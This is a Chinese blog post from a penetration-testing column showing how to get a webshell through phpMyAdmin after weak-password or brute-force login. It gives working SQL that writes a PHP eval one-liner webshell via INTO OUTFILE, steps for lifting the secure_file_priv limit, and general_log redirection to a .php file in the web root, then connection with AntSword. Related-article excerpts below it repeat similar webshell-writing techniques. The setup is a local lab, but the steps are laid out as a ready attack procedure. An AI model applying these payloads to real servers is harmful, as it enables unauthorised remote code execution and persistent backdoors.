phpmyadmin mysql getshell

最新推荐文章于 2025-04-05 23:26:31 发布
最新推荐文章于 2025-04-05 23:26:31 发布
阅读量193 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: mysql phpmyadmin
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qlqlulu/article/details/110832116
版权
这篇博客详细介绍了在发现目标系统存在phpmyadmin并成功登录后,如何通过弱口令或暴力破解获取MySQL shell的多种途径。包括利用into outfile写入一句话木马、修改mysql配置以绕过secure_file_priv限制、利用日志文件等方法。同时提到了实验环境为Windows上的phpstudy,并给出了开启和利用日志文件getshell的步骤。尽管过程中遇到了一些错误,但最终通过蚁剑成功实现远程连接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

phpmyadmin mysql getshell

在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录时,进而通过弱口令或者暴力破解进入数据库之后,有多种方法进行getshell

注:大多数集成包里自带,如:phpstudy,wampserver,xampp等

实验环境:
Windows(攻机)
Windows(靶机)phpstudy集成环境

查看日志路径,可以在变量里搜log查看
在这里插入图片描述也可以用命令语句查看

show variables  like  '%general%';

在这里插入图片描述into outfile
最常用的是一句话木马的写入

select '<?php eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy/www/xxx.php';

当然,前提是你得知道网站的绝对路径,方法也有很多,比如通过报错获取路径,通过phpinfo.php等等
但在新版的mysql中,这句话并没有运行成功,会显示错误错误。
mysql新特性secure_file_priv会对读写文件产生影响,该参数用来限制导入导出
可以查看该参数

show global variables like '%secure%';

在这里插入图片描述如果表格中的secure_file_priv显示NULL,则为空,表示限制musql不允许导入导出,所以爆出错误,要想是该语句导出成功,则需要在mysql文件夹下修改my.ini 文件,

[mysqld]内加入secure_file_priv ="" 即可

在这里插入图片描述需要重启mysql,或者重启phpstudy,就会如这样

在这里插入图片描述当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制
此时就可以执行导出命令
利用日志文件
mysql 5.0版本以上会创建日志文件,修改日志的全局变量,也可以getshell。但是也要对生成的日志有可读可写的权限。
查看日志状态

show variables  like  '%general%';

在这里插入图片描述当开启general时,所执行的sql语句都会出现在data文件夹下的文件中。
进而getshell
开启日志

SET GLOBAL general_log='on'

在这里插入图片描述设置日志的路径

SET GLOBAL general_log_file='C:/phpStudy/www/xxx.php'

路径注意反斜杠

在这里插入图片描述这是就会生成一个php文件

在这里插入图片描述将一句话木马写入这个php文件(写入一句话之前一定要关闭防火墙和杀毒软件)

SELECT '<?php eval($_POST["cmd"]);?>'

在这里插入图片描述
在这里插入图片描述
用中国菜刀或者蚁剑连接,getshell
我菜刀连不上,用的蚁剑

在这里插入图片描述在这里插入图片描述

phpmyadmin getshell的四种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 2254
phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件写 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、慢查询写入webshell4、创建数据库和表写入webshell: 1、日志文件写 shell(phpmyadmin getshell的四种方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell
phpmyadmin后台GetShell总结
李火火的安全圈
02-18 564
文章目录前言一、phpmyadmin简介二、phpmyadmin寻找、登录三、利用函数写入文件四、secure_file_priv函数五、日志文件写入Webshell六、通过慢查询方式getshell七、phpmyadmin4.8.1远程文件包含漏洞影响版本漏洞分析及复现漏洞防范 前言 文章仅用于技术学习与安全研究,切勿用于非授权下的渗透行为,出现任何后果与本文作者无关。 !!!且行且珍惜!!! 一、phpmyadmin简介 phpmyadmin是一个以PHP为基础,以web-base方式架构在网站
MySQL导出一句话拿WebShell的方法
06-19
MySQL导出一句话拿WebShell的方法
【sql注入教程】mysql注入直接getshell
dfdhxb995397的博客
08-30 1616
Mysql注入直接getshell的条件相对来说比较苛刻点把 1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道 2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了 3:要有file权限,默认情况下只有root有 4:对目录要有写权限,一般image之类的存放突破的目录就有 在实际环境中我只遇过一次,为了做实验,我把php.ini文件...
mysql怎么getshell_phpMyAdmin新姿势getshell
weixin_35249165的博客
02-02 558
0x00 设想假设我们拥有MySQL的root权限,登录Web端的phpMyAdmin数据库管理控制台,你有多少种方法去getshell?本文旨在研究新的方法,如果在INTO OUTFILE禁用的情况下,或许会少很多思路了。这里的禁用是完全(权限)禁用,而不是拦截行为。0x01 常规方法测试好了,入正题,我目前拥有一台WIN XP虚拟机,上面的服务如下:Apache 2.4.23(此环境与本文实现...
MySQL写Shell方法总结
李火火的安全圈
12-31 5017
MySQL注入点,用工具对目标站点写入一句话shell,需要哪些前提条件? **root权限以及网站的绝对路径** outfile 和 dumpfile 写Shell 利用条件 ·数据库当前用户为root权限 ·知道当前网站的绝对路径 ·PHP的GPC为OFF状态;(魔术引号,GET、POST、COOKIE) `写入的那个路径要有写入权限 过滤了单引号into outfile 还可以用吗 不能,GPC要OFF才行,可以测试Hex编码 基于UNION联合查询 ?id=1 UNION ALL SELECT
Mysql Getshell总结
热门推荐
qq_51478862的博客
05-05 1万+
获取网站根目录方式 (1) phpinfo() 页面:最理想的情况,直接显示web路径 (2) web报错信息:可以通过各种fuzz尝试让目标报错,也有可能爆出绝对路径 (3) 一些集成的web框架:如果目标站点是利用phpstudy、LAMPP等之类搭建的,可以猜测默认路径或者通过查看数据库保存的路径默认路径 winserver的iis默认路径c:\Inetpub\wwwroot linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr.
phpMyAdmin后台getshell复现
09-18
本教程详细介绍了如何通过phpMyAdmin后台实现getshell复现。首先,需要通过弱口令等方法获得phpMyAdmin的登录权限。一旦登录后,攻击者可以利用phpMyAdmin的日志记录功能来执行特定的操作,进而实现getshell。具体...
phpmyadmin+日志getshell
Zlirving_的博客
06-16 1967
通过phpmyadmin管理后台getshell思路有很多种,比如直接写入一句话、创建表再导出、慢查询日志等… 这里较详细介绍一下普通日志getshell思路   phpMyAdmin phpMyAdmin 是众多MySQL图形化管理工具中使用最为广泛的一种,是一款使用PHP 开发的基于B/S模式的MySQL客户端软件,该工具是基于 Web 跨平台的管理程序,并且支持简体中文,用户可以在官网上下载最新版本的。   GetSHELL前提 phpMyAdmin利用日志文件GetSHELL
phpMyAdmin 4.0.10 文件包含 -> getshell
2301_80115097的博客
06-25 984
gettype() 获取参数的属性也就是说我们的$var需要是一个数组这里的返回值就是True了还是刚刚说的那些,这里如果是Linux服务器的话,并且sql文件储存路径有大小写的话,就没办法拿到webshell了,并且还不能任意文件包含,还只能包含路径没有大写字符的,反正至少以我目前的水平是不行的,不过 linux 默认mysql文件的路径是 /var/lib/mysql/。默认情况下是无影响的。
mysqlgetshell的方式
unexpectedthing的博客
03-17 5515
文章目录outfile和dumpfile写shell利用条件基于union联合查询:非联合查询outfile和dumpfile的区别secure_file_prive日志getshell慢日志getshell利用general_logbinlog的介绍 outfile和dumpfile写shell 利用条件 数据库当前用户为root权限; 知道当前网站的绝对路径; PHP的GPC为 off状态;(魔术引号,GET,POST,Cookie) 写入的那个路径存在写入权限。 基于union联合查询: ?i
Mysql数据库getshell方法
weixin_68408599的博客
04-02 2406
今天摸鱼时候,突然有人问我不同的数据库getshell的方式,一时间我想到了mysql还有redis未授权访问到getshell的方式,但是仅仅第一时间只想到了这两种,我有查了查资料,找到了上面两种数据库getshell的补充,以及其他数据库getshell的方式。因此更新一个专栏,各个数据库getshell的方式。
mysql root getshell_有数据库root帐号怎么getshell
weixin_39988476的博客
01-19 203
win7移动、复制和删除文件时总提示用户需要计算机管理员提供的权限才能对此文件进行更改的解决步骤:1、打开记事本,输入下列文本:Windows Registry Editor Version 5.00[HKEY_CLASSES_ROOT\*\shell\runas]@="获取权限""NoWorkingDirectory"=""[HKEY_CLASSES_ROOT\*\shell\runas\com...
关于MySQL的几种getshell
NYG694的博客
02-01 1470
场景介绍:当靶机拥有连接数据库功能时,我们在自己服务器上开启数据库服务,下载脚本用python2运行至于读取什么文件就更改filelist就可以了。
mysql-getshell的几种方法
最新发布
lza20001103的博客
04-05 510
mysql-getshell的几种方法
phpmyadmin getshell
10-29 294
本来搞了一个站,想记录一下,结果手抖刷新了一下写文章的界面,写了一大半的文章就没了… 简单说一下, 进入 phpmyadmin 后,getshell 有两种办法。一是执行sql语句导出shell到web目录下;二是开启日志功能,改变日志文件到web目录下,然后执行sql语句,在sql语句中写php代码。 其中,方法一需要满足三个条件:①数据库root权限;②知道web目录的绝对路径;③mys...
mysql_getshell的几种方法
carmi的博客
09-12 1550
mysql_getshell 一、mysql的--os-shell 利用原理 --os-shell就是使用udf提权获取WebShell。也是通过into oufile向服务器写入两个文件,一个可以直接执行系统命令,一个进行上传文件。此为sqlmap的一个命令,利用这条命令的先决条件: 要求为数据库DBA,使用--is-dba查看当前网站连接的数据库账号是否为mysql user表中的管理员...
一次从弱口令到getshell
渗透测试研究中心
01-12 190
0x01 弱口令在一次针对某站点信息收集的过程中,通过子域名扫描,扫描到某个老旧系统。一看这都2014年的老站了,肯定有搞头!日常使用burp爆破一波试试,没爆破出来但是随手一试,好家伙123/123进入系统,属于是运气拉满了(高强度打码)这里能看到是一个“编辑”人员的权限,并没有什么上传等后台管理的功能,只能耐心过一遍系统的各种功能。0x02 SQL注入进入系统翻一翻,没有什么敏感信息泄露,但...
【渗透测试】--- 利用phpmyadmingetshell
qq_43168364的博客
12-24 708
利用phpmyadmingetshell有两种方式 1、利用into outfile直接将一句话写入文件中 2、利用Mysql的日志文件getshell 不论是那种方式都要满足以下三个条件: 未限制文件路径 secure_file_priv= 当前用户有写文件权限 知道网站根目录 — C:\phpStudy\PHPTutorial\WWW 第一种方法 select "<?php phpinfo();?>" into outfile "/var/www/html/tes
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值